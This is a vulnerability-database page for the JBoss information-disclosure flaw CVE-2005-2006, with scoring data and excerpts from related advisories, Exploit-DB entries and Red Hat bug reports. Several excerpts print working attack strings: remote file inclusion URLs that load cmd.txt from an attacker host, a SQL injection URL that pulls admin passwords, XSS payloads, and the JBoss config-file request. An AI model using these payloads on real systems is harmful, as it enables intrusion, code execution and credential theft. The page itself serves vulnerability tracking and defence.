CVE-2005-2006
published 2005-06-17CVE-2005-2006: JBOSS 3.2.2 through 3.2.7 and 4.0.2 allows remote attackers to obtain sensitive information via a GET request (1) with a "%." (percent dot), which reveals the…
PriorityP423medium5CVSS 2.0
AVNACLAuNCPINAN
EXPLOIT
EPSS
9.23%
94.7th percentile
JBOSS 3.2.2 through 3.2.7 and 4.0.2 allows remote attackers to obtain sensitive information via a GET request (1) with a "%." (percent dot), which reveals the installation path or (2) with a % (percent) before a filename, which reveals the contents of the file.
Affected
9 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| hp | systems_insight_manager | — | — |
| hp | systems_insight_manager | — | — |
| jboss | jboss | — | — |
| jboss | jboss | — | — |
| jboss | jboss | — | — |
| jboss | jboss | — | — |
| jboss | jboss | — | — |
| jboss | jboss | — | — |
| jboss | jboss | — | — |
CVSS provenance
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:P/I:N/A:N
ghsa5.0MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-4w4w-p43q-qpr8: Directory traversal vulnerability in HP Systems Insight Manager 4
ghsa_unreviewed·2022-05-01·CVSS 5.0
CVE-2006-0656 [MEDIUM] GHSA-4w4w-p43q-qpr8: Directory traversal vulnerability in HP Systems Insight Manager 4
Directory traversal vulnerability in HP Systems Insight Manager 4.2 through 5.0 SP3 for Windows allows remote attackers to access arbitrary files via unspecified vectors, a different vulnerability than CVE-2005-2006.
GHSA
GHSA-6ch7-6xxg-vw5p: JBOSS 3
ghsa_unreviewed·2022-05-01
CVE-2005-2006 [MEDIUM] GHSA-6ch7-6xxg-vw5p: JBOSS 3
JBOSS 3.2.2 through 3.2.7 and 4.0.2 allows remote attackers to obtain sensitive information via a GET request (1) with a "%." (percent dot), which reveals the installation path or (2) with a % (percent) before a filename, which reveals the contents of the file.
GHSA
Mortbay Jetty Discloses JSP Source Code
ghsa·2022-05-01·CVSS 5.0
CVE-2005-3747 [MEDIUM] CWE-200 Mortbay Jetty Discloses JSP Source Code
Mortbay Jetty Discloses JSP Source Code
Unspecified vulnerability in Jetty before 5.1.6 allows remote attackers to obtain source code of JSP pages, possibly involving requests for .jsp files with URL-encoded backslash (`%5C`) characters. NOTE: this might be the same issue as CVE-2006-2758.
No detection rules found.
Exploit-DB
phpDirectorySource 1.0 - Cross-Site Scripting / SQL Injection
exploitdb·2009-07-21
CVE-2009-4681 phpDirectorySource 1.0 - Cross-Site Scripting / SQL Injection
phpDirectorySource 1.0 - Cross-Site Scripting / SQL Injection
---
[»] [!] Coder - Developer HTML / CSS / PHP / Vb6 . [!]
[»] Web Business Directory 1.0 (search.php) Multiple Remote Vulnerabilities
[»] Script: [ Web Business Directory 1.0 ]
[»] Language: [ PHP ]
[»] Download: [ http://www.phpdirectorysource.com/ ]
[»] Founder: [ Moudi ]
[»] Thanks to: [ MiZoZ , ZuKa , str0ke , 599em Man , Security-Shell ...]
[»] Team: [ EvilWay ]
[»] Dork: [ Copyright 2005-2006 phpDirectorySource™, all rights reserved ]
[»] Price: [ $75.00 ]
[»] Site : [ https://security-shell.ws/forum.php ]
###########################################################################
===[ Exploit SQL INJECTION + LIVE : vulnerability ]===
[»] http://www.site.com/patch/search.php?sa=site&sk=a&nl=11&st=
[»
Exploit-DB
Kaspersky Internet Security 6.0.0.303 - IOCTL KLICK Local Overflow / Local Privilege Escalation
exploitdb·2006-10-29
CVE-2006-4926 Kaspersky Internet Security 6.0.0.303 - IOCTL KLICK Local Overflow / Local Privilege Escalation
Kaspersky Internet Security 6.0.0.303 - IOCTL KLICK Local Overflow / Local Privilege Escalation
---
////////////////////////////////////
///// AVP (Kaspersky)
////////////////////////////////////
//// FOR EDUCATIONAL PURPOSES ONLY
//// Kernel Privilege Escalation #2
//// Exploit
//// Rubén Santamarta
//// www.reversemode.com
//// 01/09/2006
////
////
////Modify by Nanika
////naninb[at]gmail.com
////nanika[at]chroot.org
////Exploit Get SYSTEM SHELL PORT 8080
////WindowsXP Version SP2+ Kaspersky Internet Security 6.0.0.303
////Do not Enable Hardware DEP
////Reference:
////http://hitcon.org/download/2005/Windows_Kernel_Shellcode_Exploit.pdf
////http://research.eeye.com/html/Papers/download/StepIntoTheRing.pdf
////http://www.security.org.sg/code/sdtrestore.html
////http://www.reversemode.com
Exploit-DB
Nvidia Graphics Driver 8774 - Local Buffer Overflow
exploitdb·2006-10-16
CVE-2006-5379 Nvidia Graphics Driver 8774 - Local Buffer Overflow
Nvidia Graphics Driver 8774 - Local Buffer Overflow
---
/*
* Copyright (c) 2005 Matthieu Herrb
* Copyright (c) 2006 Derek Abdine, Marc Bevand
*
* Permission to use, copy, modify, and distribute this software for any
* purpose with or without fee is hereby granted, provided that the above
* copyright notice and this permission notice appear in all copies.
*
* THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
* WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
* MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
* ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
* WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
* ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
* OR
Exploit-DB
Randshop 1.1.1 - 'header.inc.php' Remote File Inclusion
exploitdb·2006-07-01
CVE-2006-3375 Randshop 1.1.1 - 'header.inc.php' Remote File Inclusion
Randshop 1.1.1 - 'header.inc.php' Remote File Inclusion
---
Title : randshop <= 1.1.1 Remote File Inclusion Vulnerability
-
URL : http://www.randshop.com/
-
Author : OLiBekaS
-
contact : olibekas[at]gmail.com
-
dork : "software 2004-2005 by randshop"
-
exploit : http://[target]/[path]/includes/header.inc.php?dateiPfad=http://[attacker]/cmd.txt?&cmd=ls
-
greatz : Renzokuzen, skulmatic, sikunYuk, ulga, bigmaster, cgibin, weleh, and all #papmahackerlink crew
-
# milw0rm.com [2006-07-01]
Exploit-DB
Microsoft SMB Driver - Local Denial of Service
exploitdb·2006-06-13
CVE-2006-2374 Microsoft SMB Driver - Local Denial of Service
Microsoft SMB Driver - Local Denial of Service
---
// source: https://www.securityfocus.com/bid/18357/info
The Microsoft SMB driver is prone to a local denial-of-service vulnerability.
A local attacker can exploit this issue to create processes that cannot be killed in affected operating systems, potentially denying service to legitimate users and other software on affected computers. This may aid the attacker in further attacks.
////////////////////////////////////////////////////////////////////////////////
///////// MRXSMB.SYS NtClose DEADLOCK exploit///////////////////////////////////
////////////////////////////////////////////////////////////////////////////////
//November 19,2005
////////////////////////////////////////////////////////////////////////////////
//////////////////
Exploit-DB
Cisco - WebSense Content Filtering Bypass
exploitdb·2006-05-08
CVE-2006-0515 Cisco - WebSense Content Filtering Bypass
Cisco - WebSense Content Filtering Bypass
---
source: https://www.securityfocus.com/bid/17883/info
Multiple Cisco products are susceptible to a content-filtering bypass vulnerability. This issue is due to a failure of the software to properly recognize HTTP request traffic.
This issue allows users to bypass content-filtering and access forbidden websites.
Cisco is tracking this issue as Bug IDs CSCsc67612, CSCsc68472, and CSCsd81734.http://www.cisco.com/pcgi-bin/Support/Bugtool/onebug.pl?bugid=CSCsd81734
// Copyright (C) 2005-2006 Virtual Security Research, LLC. - All rights reserved
// Disclaimer: Use this tool at your own risk. The author of this utility
// nor Virtual Security Research, LLC. will assume any liability for damage
// caused by running this code. This utility is prov
Exploit-DB
BK Forum 4.0 - 'member.asp' SQL Injection
exploitdb·2006-04-24
CVE-2005-1287 BK Forum 4.0 - 'member.asp' SQL Injection
BK Forum 4.0 - 'member.asp' SQL Injection
---
# BK Forum
# Exploit:
First you must be logged in
Then type this in your browser
http://www.site.com/path/member.asp?id=-1%20UNION%20SELECT%201,memName,3,4,5,6,7,8,9,10,11,memPassword,13,14,15,16%20FROM%20member+where+memID=1
You will find admin's password
# Shoutz:
nukedx , nukedx , nukedx :) , cijfer , str0ke , Devil-00
# Have phun!
# milw0rm.com [2006-04-24]
Exploit-DB
Clansys 1.1 - 'index.php' PHP Code Insertion
exploitdb·2006-04-23
CVE-2006-2005 Clansys 1.1 - 'index.php' PHP Code Insertion
Clansys 1.1 - 'index.php' PHP Code Insertion
---
NukedX Security Advisory Nr 2006-29
ClanSys v1.1 (index.php page) PHP Code Insertion Vulnerability
Method found & Exploit scripted by nukedx
Contacts > ICQ: 10072 MSN/Main: [email protected] web: www.nukedx.com
Original advisory: http://www.nukedx.com/?viewdoc=29
Dork: "ClanSys v.1.1" 2.400 pages.
Full PoC ->
GET -> http://[victim]/[ClanSysPath]/index.php?page=[PHPCode]
EXAMPLE -> http://[victim]/[ClanSysPath]/index.php?page=&s=http://yourhost.com/cmd.txt?
# nukedx.com [2006-04-23]
# milw0rm.com [2006-04-23]
Exploit-DB
Dragonfly CMS 9.0.6.1 Stories_Archive Module - Multiple Cross-Site Scripting Vulnerabilities
exploitdb·2006-02-22
CVE-2006-1033 Dragonfly CMS 9.0.6.1 Stories_Archive Module - Multiple Cross-Site Scripting Vulnerabilities
Dragonfly CMS 9.0.6.1 Stories_Archive Module - Multiple Cross-Site Scripting Vulnerabilities
---
source: https://www.securityfocus.com/bid/16784/info
Dragonfly is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to have arbitrary script code execute in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/index.php?name=Stories_Archive&sa=show_month&year=2005&month=11">alert()
http://www.example.com/index.php?name=Stories_Archive&sa=show_month&year=2005">alert()> &month=11
http://www.example.com/index.php?name=Stories_Archive&sa=show_all">alert(
Exploit-DB
F-Secure Internet GateKeeper for Linux < 2.15.484 / Gateway < 2.16 - Local Privilege Escalation
exploitdb·2005-11-07
CVE-2006-3546 F-Secure Internet GateKeeper for Linux < 2.15.484 / Gateway < 2.16 - Local Privilege Escalation
F-Secure Internet GateKeeper for Linux "
__lastedit__ = "Thu Sep 22 23:18:39 EDT 2005"
__usage__ = """usage: %s [-options]
options:
--version show program's version number and exit.
-h, --help show this help message and exit.
-s, --suid file location to suid.
-d, --dir cgi directory.
-c, --clean cleans any left over files from the environment creation.
-# enter numerical value of vulnerable file to exploit. [list below]
1: ifconfig_suid.cgi | 2: reboot_suid.cgi | 3: proxy_suid.cgi
4: edittmpl_suid.cgi | 5: version_suid.cgi | 6: hostname_suid.cgi
7: gateway_suid.cgi | 8: halt_suid.cgi | 9: edituserdb_suid.cgi
10: htpasswd_suid.cgi | 11: pattern_up_suid.cgi | 12: license_suid.cgi
13: iptables_suid.cgi | 14: dns_suid.cgi | 15: pattern_autoup_suid.cgi
16: spam_list_suid.cgi | 17: diag_suid.
Exploit-DB
JBoss 3.x/4.0.2 - HTTP Request Remote Information Disclosure
exploitdb·2005-06-17
CVE-2005-2006 JBoss 3.x/4.0.2 - HTTP Request Remote Information Disclosure
JBoss 3.x/4.0.2 - HTTP Request Remote Information Disclosure
---
source: https://www.securityfocus.com/bid/13985/info
JBoss is prone to a remote information-disclosure vulnerability. The issue occurs in the 'org.jboss.web.WebServer' class and is due to a lack of sufficient sanitization of user-supplied request data.
Information that attackers can harvest through leveraging this issue may aid in further attacks against the affected service.
Example 1 (Installation path disclosure): [3.2.x and 4.0.2]
Request:
>>telnet [jbosshost] 8083
>>GET %. HTTP/1.0
Reply:
HTTP/1.0 400 C:\Programme\jboss-4.0.2\server\default\conf (Zugriff
verweigert)
Content-Type: text/html
Example 2 (Config file download): [4.0.2]
Request:
>>telnet [jbosshost] 8083
>>GET %server.policy HTTP/1.0
HackerOne
Linux kernel: CVE-2017-6074: DCCP double-free vulnerability
hackerone·2019-08-27·CVSS 7.8
CVE-2017-6074 [HIGH] Linux kernel: CVE-2017-6074: DCCP double-free vulnerability
Linux kernel: CVE-2017-6074: DCCP double-free vulnerability
Hi!
CVE-2017-6074 [1] is a double-free vulnerability I found in the Linux kernel. It can be exploited to gain
kernel code execution from an unprivileged processes. The kernel needs to be built with CONFIG_IP_DCCP for the vulnerability to be present. A lot of modern distributions enable this option by default.
Fixed on Feb 17, 2017 [2]. The oldest version that I checked is 2.6.18 (Sep 2006), which is vulnerable. However, the bug was introduced before that, probably in the first release with DCCP support (2.6.14, Oct 2005).
I initially reported this vulnerability to [email protected] following the coordinated disclosure process. The timeline and more details about the vulnerability can be found in my announcement on oss-securi
Bugzilla
CVE-2006-0082 security flaw
bugzilla·2018-08-16·CVSS 7.5
CVE-2006-0082 [HIGH] CVE-2006-0082 security flaw
CVE-2006-0082 security flaw
Flaw bug created to hold information about an old flaw we knew something about. For more details see the MITRE CVE description.
Discussion:
MITRE description:
Format string vulnerability in the SetImageInfo function in image.c for ImageMagick 6.2.3 and other versions, and GraphicsMagick, allows user-assisted attackers to cause a denial of service (crash) and possibly execute arbitrary code via a numeric format string specifier such as %d in the file name, a variant of CVE-2005-0397, and as demonstrated using the convert program.
Bugzilla
A number of tomcat issues
bugzilla·2007-05-09·CVSS 5.0
CVE-2005-3164 [MEDIUM] A number of tomcat issues
A number of tomcat issues
A number of issues affected tomcat 4.0.6 as distributed with Stronghold. Most
of these are minor severity, all need triaging:
http://tomcat.apache.org/security-4.html
Information disclosure CVE-2005-3164
Information disclosure CVE-2005-2090
Directory traversal CVE-2007-0450
Cross-site scripting CVE-2007-1358
Cross-site scripting CVE-2006-7196
Directory listing CVE-2006-3835
Cross-site scripting CVE-2005-4838
Denial of service CVE-2005-3510
Denial of service CVE-2003-0866
Information disclosure CVE-2002-2006
Discussion:
closing; Stronghold has reached end of life.
Bugzilla
CVE-2005-3352, CVE-2006-3918 apache security issues
bugzilla·2006-09-25·CVSS 4.3
CVE-2005-3352 [MEDIUM] CVE-2005-3352, CVE-2006-3918 apache security issues
CVE-2005-3352, CVE-2006-3918 apache security issues
Description of problem:
The following issues affect the stronghold-apache package:
CVE-2006-3918 Expect header XSS
CVE-2005-3352 cross-site scripting flaw in mod_imap
Version-Release number of selected component (if applicable):
stronghold-apache-1.3.22-25
Discussion:
An advisory has been issued which should help the problem
described in this bug report. This report is therefore being
closed with a resolution of ERRATA. For more information
on the solution and/or where to find the updated files,
please follow the link below. You may reopen this bug report
if the solution does not work for you.
http://rhn.redhat.com/errata/RHSA-2006-0692.html
---
*** Bug 204049 has been marked as a duplicate of this bug. ***
Bugzilla
CVE-2006-0052 Mailman DoS, CVE-2006-1712 Mailman cross site scripting bug and CVE-2005-3573 Mailman Denial of Service (CVE-2005-4153); also CAN-2004-1177 Cross-site scripting (XSS) vulnerability
bugzilla·2006-06-02·CVSS 5.0
CVE-2006-0052 [MEDIUM] CVE-2006-0052 Mailman DoS, CVE-2006-1712 Mailman cross site scripting bug and CVE-2005-3573 Mailman Denial of Service (CVE-2005-4153); also CAN-2004-1177 Cross-site scripting (XSS) vulnerability
CVE-2006-0052 Mailman DoS, CVE-2006-1712 Mailman cross site scripting bug and CVE-2005-3573 Mailman Denial of Service (CVE-2005-4153); also CAN-2004-1177 Cross-site scripting (XSS) vulnerability
Mailman DoS allows remote attackers to cause a denial of service by using
multipart MIME message with a single part MIME message.
Mailman cross site scripting bug allows remote attackers to inject arbitrary web
script in the form ofaction argument.
In Mailman Denial of Service application crash and server message "fail with an
Overflow on bad date data in a processed message".
http://www.redhat.com/archives/fedora-test-list/2006-May/msg00131.html
http://www.redhat.com/archives/fedora-package-announce/2006-May/msg00134.htm
http://www.redhat.com/archives/fedora-package-announce/2006-May/msg00135.
Bugzilla
CVE-2005-4667 unzip long filename buffer overflow
bugzilla·2006-03-24·CVSS 3.7
CVE-2005-4667 [LOW] CVE-2005-4667 unzip long filename buffer overflow
CVE-2005-4667 unzip long filename buffer overflow
+++ This bug was initially created as a clone of Bug #178960 +++
unzip long filename buffer overflow
unzip is vulnerable to a filename buffer overflow vulnerability. It
may be possible to execute arbitrary code as the user running unzip.
http://www.securityfocus.com/bid/15968/info
This issue can be verified with the following command:
unzip `perl -e 'print "A" x 50000'`
This issue also affects RHEL3
This issue also affects RHEL2.1
-- Additional comment from [email protected] on 2006-03-24 08:51 EST --
Exception approved at Mar 23 RHEL Updates meeting, added to RHEL4U4Proposed.
Please clone bug for RHEL3 and 2.1.
Discussion:
This flaw has been rated as having a low severity by the Red Hat
Security Response Team. More information
Bugzilla
CVE-2006-0746 kpdf buffer overflow
bugzilla·2006-03-07·CVSS 7.5
CVE-2006-0746 [HIGH] CVE-2006-0746 kpdf buffer overflow
CVE-2006-0746 kpdf buffer overflow
+++ This bug was initially created as a clone of Bug #184307 +++
The initial fix for CVE-2005-3627 was incomplete in kdegraphics.
The complete patch is attachment 125771
The reproducer is attachment 125772
Here is Chris Evans' original advisory, it has links to various other bad pdf files:
http://scary.beasts.org/security/CESA-2005-003.txt
Discussion:
there's kde-3.5.1 in FC4-update. It's not effected in this new kde version
http://www.kde.org/info/security/advisory-20060202-1.txt
Bugzilla
CVE-2005-3656 mod_auth_pgsql format string issue
bugzilla·2006-01-09·CVSS 10.0
CVE-2005-3656 [CRITICAL] CVE-2005-3656 mod_auth_pgsql format string issue
CVE-2005-3656 mod_auth_pgsql format string issue
Note that the Red Hat Security Response Team has rated this issue as having
critical security impact.
+++ This bug was initially created as a clone of Bug #177042 +++
iDEFENSE has reported a format string flaw in mod_auth_pgsql. This could allow
a remote unauthenticated attacker to execute arbitrary code as the httpd process.
-- Additional comment from [email protected] on 2006-01-05 13:12 EST --
This issue should also affect RHEL2.1 and RHEL3
-- Additional comment from [email protected] on 2006-01-05 13:34 EST --
RHEL2.1 uses version 0.9.9 of mod_auth_pgsql which uses different a different
mechanism for logging of failures and is not affected by this vulnerability.
-- Additional comment from [email protected] on 2006-01-05 21:38 EST
Bugzilla
[PATCH] CVE-2006-0106: WINE vulnerable to CVE-2005-4560 WMF exploit
bugzilla·2006-01-08·CVSS 7.5
CVE-2006-0106 [HIGH] [PATCH] CVE-2006-0106: WINE vulnerable to CVE-2005-4560 WMF exploit
[PATCH] CVE-2006-0106: WINE vulnerable to CVE-2005-4560 WMF exploit
From Bugzilla Helper:
User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.0 (like Gecko)
Description of problem:
Wine implements the full WMF API including SETABORTPROC, making it vulnerable
to the Windows WMF exploit (CVE-2005-4560).
This has been fixed in WINE CVS (revision 1.12 of wine/dlls/gdi/metafile.c).
URL: http://it.slashdot.org/comments.pl?sid=173205&cid=14412824 (or you can
get it directly from WINE CVS).
Version-Release number of selected component (if applicable):
wine-0.9.4-5.fc4
How reproducible:
Didn't try
Steps to Reproduce:
Try:
1. firing up a vulnerable Windows app in WINE and
2. opening an infected WMF file with it.
Actual Results: If what I've read is true, it is vulnerable.
E
Bugzilla
CVE-2005-3651 ethereal OSPF Protocol Dissector Buffer Overflow Vulnerability
bugzilla·2006-01-04·CVSS 7.5
CVE-2005-3651 [HIGH] CVE-2005-3651 ethereal OSPF Protocol Dissector Buffer Overflow Vulnerability
CVE-2005-3651 ethereal OSPF Protocol Dissector Buffer Overflow Vulnerability
iDEFENSE discovered a buffer overflow vulnerability in Ethereal's OSPF protocol
dissector.
http://www.idefense.com/application/poi/display?id=349&type=vulnerabilities
This issue also affects RHEL2.1 and RHEL3
Discussion:
An advisory has been issued which should help the problem
described in this bug report. This report is therefore being
closed with a resolution of ERRATA. For more information
on the solution and/or where to find the updated files,
please follow the link below. You may reopen this bug report
if the solution does not work for you.
http://rhn.redhat.com/errata/RHSA-2006-0156.html
Bugzilla
CVE-2006-0082 ImageMagick format string vulnerability.
bugzilla·2006-01-04·CVSS 7.5
CVE-2006-0082 [HIGH] CVE-2006-0082 ImageMagick format string vulnerability.
CVE-2006-0082 ImageMagick format string vulnerability.
ImageMagick format string vulnerability.
The fix for CVE-2005-0397 is incomplete. As the Debian bug suggests,
by running a command such as:
convert file.jpg file%d%n.jpg
A segfault will result in ImageMagick.
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=345876
This issue also affects RHEL3
This issue also affects RHEL2.1
Discussion:
The fix in the debian bug is incomplete, the same code is repeated in blob.c
---
Created attachment 122767
patch for 6.2.5 (Rawhide)
---
Created attachment 122771
patch for 6.0.7 (RHEL 4)
---
Created attachment 122772
patch for 5.5.6 (RHEL 3)
---
Created attachment 122773
patch for 5.3.8 (RHEL 2.1)
---
The fixes are contained in
ImageMagick-6.0.7.1-14 (RHEL4)
ImageMagick-5.5.6-17 (RHE
Bugzilla
CVE-2005-3964 openmotif libUil buffer overflows
bugzilla·2005-12-02·CVSS 7.5
CVE-2005-3964 [HIGH] CVE-2005-3964 openmotif libUil buffer overflows
CVE-2005-3964 openmotif libUil buffer overflows
openmotif libUil buffer overflows
http://marc.theaimsgroup.com/?l=full-disclosure&m=113349242925897&w=2
xfocus have discovered two buffer overflow flaws in openmotif's libUil
library. This overflow is going to depend on how a motif application
is passing data into the UIL library.
This issue also affects FC3
Discussion:
An advisory has been issued which should help the problem
described in this bug report. This report is therefore being
closed with a resolution of ERRATA. For more information
on the solution and/or where to find the updated files,
please follow the link below. You may reopen this bug report
if the solution does not work for you.
http://rhn.redhat.com/errata/RHSA-2006-0272.html
---
I can see where this issue has been
Bugzilla
CVE-2005-2973 ipv6 infinite loop
bugzilla·2005-10-14·CVSS 2.1
CVE-2005-2973 [LOW] CVE-2005-2973 ipv6 infinite loop
CVE-2005-2973 ipv6 infinite loop
Patch successfully tested and posted for internal review on 27-Oct-2005.
Discussion:
A fix for this problem has just been committed to the RHEL3 U7
patch pool this evening (in kernel version 2.4.21-37.8.EL).
---
A fix for this problem has also been committed to the RHEL3 E7
patch pool this evening (in kernel version 2.4.21-37.0.1.EL).
---
An advisory has been issued which should help the problem
described in this bug report. This report is therefore being
closed with a resolution of ERRATA. For more information
on the solution and/or where to find the updated files,
please follow the link below. You may reopen this bug report
if the solution does not work for you.
http://rhn.redhat.com/errata/RHSA-2006-0140.html
Bugzilla
CVE-2005-1704 Integer overflow in libelf
bugzilla·2005-06-08·CVSS 4.6
CVE-2005-1704 [MEDIUM] CVE-2005-1704 Integer overflow in libelf
CVE-2005-1704 Integer overflow in libelf
Integer overflow in the BFD library for libelf before 6.3 allows attackers to
execute arbitrary code via a crafted object file that specifies a large number
of section headers, leading to a heap-based buffer overflow.
Discussion:
This issue should also affect RHEL2.1 and RHEL3
---
elfutils is not in RHEL2.1, my mistake.
---
An advisory has been issued which should help the problem
described in this bug report. This report is therefore being
closed with a resolution of ERRATA. For more information
on the solution and/or where to find the updated files,
please follow the link below. You may reopen this bug report
if the solution does not work for you.
http://rhn.redhat.com/errata/RHSA-2006-0354.html
http://archives.neohapsis.com/archives/fulldisclosure/2006-07/0424.htmlhttp://marc.info/?l=bugtraq&m=111911095424496&w=2http://secunia.com/advisories/15746http://secunia.com/advisories/17559http://secunia.com/advisories/18789http://securityreason.com/securityalert/439http://securitytracker.com/id?1015605http://www.securityfocus.com/archive/1/440641/100/100/threadedhttp://www.securityfocus.com/bid/13985http://www.vupen.com/english/advisories/2005/0815http://www.vupen.com/english/advisories/2006/0497http://www1.itrc.hp.com/service/cki/docDisplay.do?docId=c00597967http://archives.neohapsis.com/archives/fulldisclosure/2006-07/0424.htmlhttp://marc.info/?l=bugtraq&m=111911095424496&w=2http://secunia.com/advisories/15746http://secunia.com/advisories/17559http://secunia.com/advisories/18789http://securityreason.com/securityalert/439http://securitytracker.com/id?1015605http://www.securityfocus.com/archive/1/440641/100/100/threadedhttp://www.securityfocus.com/bid/13985http://www.vupen.com/english/advisories/2005/0815http://www.vupen.com/english/advisories/2006/0497http://www1.itrc.hp.com/service/cki/docDisplay.do?docId=c00597967
2005-06-17
Published